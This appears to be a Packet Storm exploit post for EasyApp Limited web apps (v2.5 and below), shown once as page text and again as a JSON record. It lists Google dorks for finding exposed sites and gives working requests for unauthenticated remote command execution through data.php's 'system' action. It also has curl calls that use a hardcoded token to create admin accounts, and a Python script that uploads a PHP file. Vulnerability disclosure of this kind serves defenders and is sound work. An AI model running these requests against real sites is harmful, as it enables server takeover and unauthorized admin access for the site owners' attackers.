📄 EasyApp Limited 2.5 Remote Code Execution / Deserialization /...

Description

EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks like it may also suffer from cross...

Visit Original Source

Basic Information

ID PACKETSTORM:208780

Published Aug 22, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: EasyApp Limited - Multiple Vulnerabilities
# Date: 2025-06-27
# Exploit Author: bRpsd -> cy[at]live.no
# Vendor Homepage: https://easyapp.com.hk/
# Products: Easy Shop, Easy Food, Handlebook
# Affected Versions: v2.5 and below
# CVE: N/A
# Tested on: localhost xampp, MacOS
# Dorks:
"Powered By Easyapp © 2025"
Powered By EasyApp Limited inurl:app/web
"Powered By EasyApp Limited"
"DESIGN BY HANDLEBOOK EDUCATION SOLUTIONS © 2025"
"EasyApp Login"
inurl:/web/product_detail.php?linkid=
inurl:app/admin2/login.php
inurl:app/#!/template/newsList.php

##########################################################################################
Vulnerability: PHP Object Injection "CWE-502: Deserialization of Untrusted Data"
The function directly processes unsanitized JSON input from php://input leading to Unauthenticated RCE
File: /app/php/data.php

Code:
=================================================================================
$path = $_SERVER['DOCUMENT_ROOT'];
include_once($path);
$json = json_decode(file_get_contents("php://input"),true) ;
// Calling Custom Function
echo json_encode($json["action"]($json["data"]));
=================================================================================

POC:
==========================================================================================
POST https://localhost/app/php/data.php HTTP/1.1
host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 35
Connection: keep-alive
Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"action":"system","data":"whoami"}

Response:
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2025 14:19:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

root
"root"

Using CURL:
curl -X POST https://localhost/app/php/data.php \
-H "Content-Type: application/json" \
-d '{"action":"system","data":"uname"}'

"Darwin"

##########################################################################################
Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials)
File: /app/admin2/php/data.php
Code:
=================================================================================
function getAppAccessRight($functionName,$param)
{
$data = array();
$data["status"] = "SUCCESS" ;
$uid = $_COOKIE["uid"] ;
$token = $_COOKIE["token"] ;
$escapeFunction = ESCAPE_FUNC_TOKEN ;
// echo $functionName . "<br/>";
// echo $escapeFunction . "<br/>";
if (strpos($escapeFunction, $functionName) !==false)
return $data ;
if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
return $data ;
=================================================================================

This means calling arbitrary admin functions via /app/admin2/php/data.php can be easily bypassed,We can use this hard-coded token to (create admin, update an admin) and trigger MANY other admin-based functions directly:

POC:
==========================================================================================
curl -X POST \
'https://localhost/app/admin2/php/data.php' \
-H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
-H 'Content-Type: application/json' \
-d '{
"action": "updateAdmin",
"data": {
"fullname": "X",
"loginid": "XXXXXXXXXX",
"pwd": "XXXXXXXXXX",
"email": "[email protected]",
"role": "ADMIN",
"userid": "1",
"imgattachid": "1"
}
}'

Response:
{"uid":"UID_HERE","status":"SUCCESS"}

curl -X POST \
'https://localhost/app/admin2/php/data.php' \
-H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
-H 'Content-Type: application/json' \
-d '{
"action": "createAdmin",
"data": {
"fullname": "X",
"loginid": "X",
"pwd": "X",
"email": "[email protected]",
"role": "ADMIN",
"userid": "1",
"imgattachid": "1"
}
}'
Response:
{"uid":"UID_HERE","status":"SUCCESS"}
==========================================================================================

##########################################################################################
Vulnerability: Unauthenticated Arbitrary File UPLOAD,DELETE & Exposure
path: app/admin2/userimg

Direct access expose list of files uploaded to the directory /app/admin2/userimg/:

Example:
{"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}

We can run direct commands to upload/delete

Python Code for uploading a test.php:
==========================================================================================
import requests
# Define the URL and headers
url = "https://localhost/app/admin2/userimg/"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br, zstd",
"X-Requested-With": "XMLHttpRequest",
"Origin": "https://localhost/",
"Connection": "keep-alive",
"Referer": "https://localhost/app/admin2/news-list-add.php",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin"
}

# Payload to accept file (some settings allow direct PHP upload, others don't)
payload = {
'attachid': '1',
'gtitle_zh': '1',
'linkid': '1'
}

files = {
'files[]': ('x.PhP', 'test', 'multipart/form-data')
}

response = requests.post(url, headers=headers, data=payload, files=files)

# Print the response
print(f"Status Code: {response.status_code}")
print("Response Text:", response.text)
==========================================================================================

Too lazy to list the OTHER weakness points such as:
1- Using HTML JS redirection to prevent admin access [/app/admin2/] instead of PHP-based code. Meaning anyone can view admin dashboard and its HTML source code & tamper around.

2- IP Address Spoofing by relying on HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers for authentication which can be spoofed

3- Weak Cryptography

4- No CSRF/XSS/SQLi control

5- Imporoper control of code generation like using "strpos($escapeFunction, $functionName)" instead of "strpos($functionName, $escapeFunction)", Misspelled "TRUE" as "TURE" in 2FA activation..

6- Accessible test files in paths like /app/admin2/testFn.php [Arbitrary File Upload], along with other vulnerable endpoints

{
    "lastseen": "2025-08-22T17:56:38",
    "description": "EasyApp Limited versions 2.5 and below suffer from PHP object injection allowing for remote code execution, arbitrary file upload, and hardcoded credential vulnerabilities. It looks like it may also suffer from cross...",
    "published": "2025-08-22T00:00:00",
    "modified": "2025-08-22T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 EasyApp Limited 2.5 Remote Code Execution / Deserialization / File Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:208780",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: EasyApp Limited - Multiple Vulnerabilities\n    # Date: 2025-06-27\n    # Exploit Author: bRpsd -> cy[at]live.no\n    # Vendor Homepage: https://easyapp.com.hk/\n    # Products: Easy Shop, Easy Food, Handlebook\n    # Affected Versions: v2.5 and below\n    # CVE: N/A\n    # Tested on: localhost xampp, MacOS\n    # Dorks:\n    \"Powered By Easyapp \u00a9\u00a02025\"\n    Powered By EasyApp Limited inurl:app/web\n    \"Powered By EasyApp Limited\"\n    \"DESIGN BY\u00a0HANDLEBOOK EDUCATION SOLUTIONS\u00a0\u00a9 2025\"\n    \"EasyApp Login\"\n    inurl:/web/product_detail.php?linkid=\n    inurl:app/admin2/login.php\n    inurl:app/#!/template/newsList.php\n    \n    \n    \n    \n    ##########################################################################################\n    Vulnerability: PHP Object Injection \"CWE-502: Deserialization of Untrusted Data\"\n    The function directly processes unsanitized JSON input from php://input leading to Unauthenticated RCE\n    File: /app/php/data.php\n    \n    Code:\n    =================================================================================\n    \t$path = $_SERVER['DOCUMENT_ROOT'];\n    \tinclude_once($path);\n    \t$json = json_decode(file_get_contents(\"php://input\"),true) ; \n    \t// Calling Custom Function\n    \techo json_encode($json[\"action\"]($json[\"data\"]));\n    =================================================================================\n    \n    \n    \n    POC:\n    ==========================================================================================\n    POST https://localhost/app/php/data.php HTTP/1.1\n    host: localhost\n    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0\n    Accept: application/json, text/javascript, */*; q=0.01\n    Accept-Language: en-US,en;q=0.5\n    Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n    X-Requested-With: XMLHttpRequest\n    content-length: 35\n    Connection: keep-alive\n    Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674\n    Sec-Fetch-Dest: empty\n    Sec-Fetch-Mode: cors\n    Sec-Fetch-Site: same-origin\n    \n    {\"action\":\"system\",\"data\":\"whoami\"}\n    \n    \n    Response:\n    HTTP/1.1 200 OK\n    Date: Thu, 15 Aug 2025 14:19:26 GMT\n    Content-Type: text/html; charset=UTF-8\n    Connection: keep-alive\n    \n    root\n    \"root\"\n    \n    \n    \n    Using CURL:\n    curl -X POST https://localhost/app/php/data.php \\\n    -H \"Content-Type: application/json\" \\\n    -d '{\"action\":\"system\",\"data\":\"uname\"}'\n    \n    \"Darwin\"\n    \n    \n    \n    \n    ##########################################################################################\n    Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials) \n    File: /app/admin2/php/data.php\n    Code:\n    =================================================================================\n    function getAppAccessRight($functionName,$param)\n        {\n            $data = array();\n    \t\t$data[\"status\"] = \"SUCCESS\" ; \n            $uid = $_COOKIE[\"uid\"] ; \n            $token = $_COOKIE[\"token\"] ; \n            $escapeFunction = ESCAPE_FUNC_TOKEN ; \n            // echo $functionName . \"<br/>\";\n            // echo $escapeFunction . \"<br/>\";\n            if (strpos($escapeFunction, $functionName) !==false)\n                return $data ; \n    \t\tif ($token == \"abcdefghijklmnopqrstuvwxyz1234567890\")\n    \t\t\treturn $data ; \n    =================================================================================\n    \n    \n    This means calling arbitrary admin functions via /app/admin2/php/data.php can be easily bypassed,We can use this hard-coded token to (create admin, update an admin) and trigger MANY other admin-based functions directly:\n    \n    POC:\n    ==========================================================================================\n    curl -X POST \\\n      'https://localhost/app/admin2/php/data.php' \\\n      -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \\\n      -H 'Content-Type: application/json' \\\n      -d '{\n        \"action\": \"updateAdmin\",\n        \"data\": {\n          \"fullname\": \"X\",\n          \"loginid\": \"XXXXXXXXXX\",\n          \"pwd\": \"XXXXXXXXXX\",\n          \"email\": \"[email protected]\",\n          \"role\": \"ADMIN\",\n          \"userid\": \"1\",\n          \"imgattachid\": \"1\"\n        }\n      }'\n      \n    Response:\n      {\"uid\":\"UID_HERE\",\"status\":\"SUCCESS\"}\n    \t\t\t\n    \t\t\t\n    curl -X POST \\\n      'https://localhost/app/admin2/php/data.php' \\\n      -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \\\n      -H 'Content-Type: application/json' \\\n      -d '{\n        \"action\": \"createAdmin\",\n        \"data\": {\n          \"fullname\": \"X\",\n          \"loginid\": \"X\",\n          \"pwd\": \"X\",\n          \"email\": \"[email protected]\",\n          \"role\": \"ADMIN\",\n          \"userid\": \"1\",\n          \"imgattachid\": \"1\"\n        }\n      }'\n    Response:\n      {\"uid\":\"UID_HERE\",\"status\":\"SUCCESS\"}\n    ==========================================================================================\n    \n    \n    \n    \n    \n    ##########################################################################################\n    Vulnerability: Unauthenticated Arbitrary File UPLOAD,DELETE & Exposure\n    path: app/admin2/userimg\n    \n    Direct access expose list of files uploaded to the directory /app/admin2/userimg/:\n    \n    Example:\n    {\"files\":[{\"name\":\"x.jpg\",\"size\":4,\"url\":\"https:\\/\\/localhost\\/app\\/admin2\\/userimg\\/files\\/x.jpg\",\"deleteUrl\":\"https:\\/\\/localhost.hk\\/app\\/admin2\\/userimg\\/index2.php?file=x.jpg\",\"deleteType\":\"DELETE\"}]}\n    \n    We can run direct commands to upload/delete\n    \n    Python Code for uploading a test.php:\n    ==========================================================================================\n    import requests\n    # Define the URL and headers\n    url = \"https://localhost/app/admin2/userimg/\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0\",\n        \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n        \"Accept-Language\": \"en-US,en;q=0.5\",\n        \"Accept-Encoding\": \"gzip, deflate, br, zstd\",\n        \"X-Requested-With\": \"XMLHttpRequest\",\n        \"Origin\": \"https://localhost/\",\n        \"Connection\": \"keep-alive\",\n        \"Referer\": \"https://localhost/app/admin2/news-list-add.php\",\n        \"Sec-Fetch-Dest\": \"empty\",\n        \"Sec-Fetch-Mode\": \"cors\",\n        \"Sec-Fetch-Site\": \"same-origin\"\n    }\n    \n    # Payload to accept file (some settings allow direct PHP upload, others don't)\n    payload = {\n        'attachid': '1',\n        'gtitle_zh': '1',\n        'linkid': '1'\n    }\n    \n    files = {\n        'files[]': ('x.PhP', 'test', 'multipart/form-data')\n    }\n    \n    response = requests.post(url, headers=headers, data=payload, files=files)\n    \n    # Print the response\n    print(f\"Status Code: {response.status_code}\")\n    print(\"Response Text:\", response.text)\n    ==========================================================================================\n    \n    \n    \n    Too lazy to list the OTHER weakness points such as:\n    1- Using HTML JS redirection to prevent admin access [/app/admin2/] instead of PHP-based code. Meaning anyone can view admin dashboard and its HTML source code & tamper around.\n    \n    2- IP Address Spoofing by relying on HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers for authentication which can be spoofed\n    \n    3- Weak Cryptography\n    \n    4- No CSRF/XSS/SQLi control\n    \n    5- Imporoper control of code generation like using \"strpos($escapeFunction, $functionName)\" instead of \"strpos($functionName, $escapeFunction)\", Misspelled \"TRUE\" as \"TURE\" in 2FA activation..\n    \n    6- Accessible test files in paths like /app/admin2/testFn.php [Arbitrary File Upload], along with other vulnerable endpoints",
    "sourceHref": "https://packetstorm.news/download/208780",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/208780/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 EasyApp Limited 2.5 Remote Code Execution / Deserialization / File Upload_PACKETSTORM:208780

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply